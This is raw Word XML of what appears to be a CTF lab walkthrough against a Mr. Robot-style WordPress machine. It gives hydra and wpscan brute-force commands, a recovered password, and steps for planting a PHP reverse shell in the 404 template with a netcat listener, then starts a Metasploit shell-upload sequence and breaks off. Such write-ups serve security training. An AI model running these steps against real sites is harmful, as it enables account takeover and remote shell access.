    <w:p w14:paraId="3AB0376C" w14:textId="158EF938" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, post form location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B0307" w14:textId="1D13A50E" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">log and pass set as -L and -p, log and pass can be found on the burp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFE062" w14:textId="0BA92461" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>interception as being identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FFC52" w14:textId="6F7BCDA3" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>F=Invalid Username sets fail point that is referenced in the error message when a wrong username is entered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4FC534" w14:textId="3400A3E3" w:rsidR="00D41059" w:rsidRDefault="00A24823" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="179C154F" wp14:editId="54141560">
            <wp:extent cx="5943600" cy="15335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6B9946C4" w14:textId="77777777" w:rsidR="002C2B23" w:rsidRDefault="002C2B23" w:rsidP="00D41059"/>
    <w:p w14:paraId="284D5FEB" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>USERNAME IS ELLIOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B656FF2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Option 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D846BE2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -P [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sorted_fsociety.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] http-post-form '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wp-login.php:log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=^USER^&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=^PASS^&amp;wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sumbit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Log+In:F</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=is incorrect'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B9632" w14:textId="050561DE" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, lower case to indicate exact user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DAE84" w14:textId="6D02F61E" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-P password file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268CDA31" w14:textId="64040840" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>http-post-form, because it shown on burp as a post form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B5449" w14:textId="3281241C" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, post form location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD16C3" w14:textId="55D19E0D" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">log and pass set as -L and -p, log and pass can be found on the burp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F110D" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>interception as being identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1E143C" w14:textId="2184F64B" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>F=is incorrect sets fail point that is referenced in the error message when a wrong password is entered</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E95CBD" w14:textId="12520A34" w:rsidR="00A24823" w:rsidRDefault="00A24823" w:rsidP="00A24823">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="705E3B0A" wp14:editId="5B2AE095">
            <wp:extent cx="5943600" cy="13188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943600" cy="1318895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB2CF2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Option 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F8102A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -P [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sorted_fsociet.dic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4490E357" w14:textId="49968383" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-u sets user as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, and -P sets password lists. syntax is easier, but enumeration on user id's is limited, so you must have a user id if unique user. It will check against admin etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056E5068" w14:textId="2B5F1FD8" w:rsidR="00D41059" w:rsidRDefault="00A24823" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9DA5AA" wp14:editId="110394B9">
            <wp:extent cx="5029200" cy="4098046"/>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extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5042794" cy="4109123"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B01EA03" wp14:editId="6B4DAAB6">
            <wp:extent cx="5943600" cy="37693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a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3769360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B556354" wp14:editId="1D9AE8DA">
            <wp:extent cx="5943600" cy="2161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5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2161540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F6A6A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">[wp-username] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E724D09" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>[wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pasword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] = ER28-0652</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520214BB" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="34E22832" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Now we can log into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632CCCF8" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="48C038E2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Forward Facing Application Leverage and generate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>damion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11531A6F" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Option #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C29D01E" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Log into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B21E6CA" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">Applications&gt;edit&gt;Edit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>404 page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FAFB2" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Reverse Shell on the 404 page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F24111C" w14:textId="76F4991E" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell code: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D717C67" w14:textId="5626CCC3" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reverse shell, changed [attacker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]/[port]</w:t>
      </w:r>
      <w:r w:rsidR="00A24823">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="626D63A5" wp14:editId="298A2923">
            <wp:extent cx="5943600" cy="31597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inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A24823">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35F9AF56" wp14:editId="59EE45D3">
            <wp:extent cx="5943600" cy="31692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r w:rsidR="00A24823">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76CCD26C" wp14:editId="1669BDF0">
            <wp:extent cx="5943600" cy="31597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inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A24823">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7144ED13" wp14:editId="71A85263">
            <wp:extent cx="5943600" cy="31769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14:paraId="05BE6C6A" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551CEAF" w14:textId="120D83C5" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">net cat -listen, verbose, skip </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lookup, port [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0344B1" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="0026569B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go back to the website, and place an incorrect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to trigger the 404 page, which in turns activates the reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BE56F" w14:textId="0D316C00" w:rsidR="00D41059" w:rsidRDefault="0026569B" w:rsidP="00D41059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C08EDC1" wp14:editId="4B240452">
            <wp:extent cx="5943600" cy="1169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5943600" cy="1169035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3B3E1A" w14:textId="77777777" w:rsidR="0026569B" w:rsidRDefault="0026569B" w:rsidP="00D41059"/>
    <w:p w14:paraId="5E6F2C57" w14:textId="3FC68DD0" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t xml:space="preserve">WE ARE IN THE TERMINAL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9428C" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="6A04F120" w14:textId="0DAD9351" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>now in bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA34B90" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059"/>
    <w:p w14:paraId="4596C594" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:t>Option #2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442698AE" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17BC23DB" w14:textId="337AD093" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09A05778" w14:textId="017A75C4" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>opens Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204995F" w14:textId="1D7EE812" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA05C7E" wp14:editId="0161BC3C">
            <wp:extent cx="5943600" cy="46335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5943600" cy="4633595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899BCB4" w14:textId="049570BD" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7412A7A2" wp14:editId="3D84D2DB">
            <wp:extent cx="5943600" cy="2390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27B83777" w14:textId="73CD6FBB" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B443D44" w14:textId="2B99EB36" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>searches for vulnerabilities associated with “word press shell”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE14451" w14:textId="1D0E629E" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BE9F6D4" wp14:editId="245CD1CD">
            <wp:extent cx="5943600" cy="31191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943600" cy="3119120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61349ED4" w14:textId="02624688" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>use 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0ED38F" w14:textId="676EFC96" w:rsidR="009B7B11" w:rsidRDefault="00D41059" w:rsidP="009B7B11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wp-reverse-shell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulnerablility</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3ABE199C" w14:textId="4F0E2D4F" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED135A" w14:textId="27DCFCF5" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>shows what information is needed to complete the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E0FD25" w14:textId="03B3C8EF" w:rsidR="009B7B11" w:rsidRDefault="009B7B11" w:rsidP="009B7B11">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23302B1A" wp14:editId="136C3DDD">
            <wp:extent cx="5943600" cy="3367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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E95369" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t>set username [wp-username]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77319F89" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>wp-password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2340B" w14:textId="77777777" w:rsidR="00D41059" w:rsidRDefault="00D41059" w:rsidP="00D41059">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>targetip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
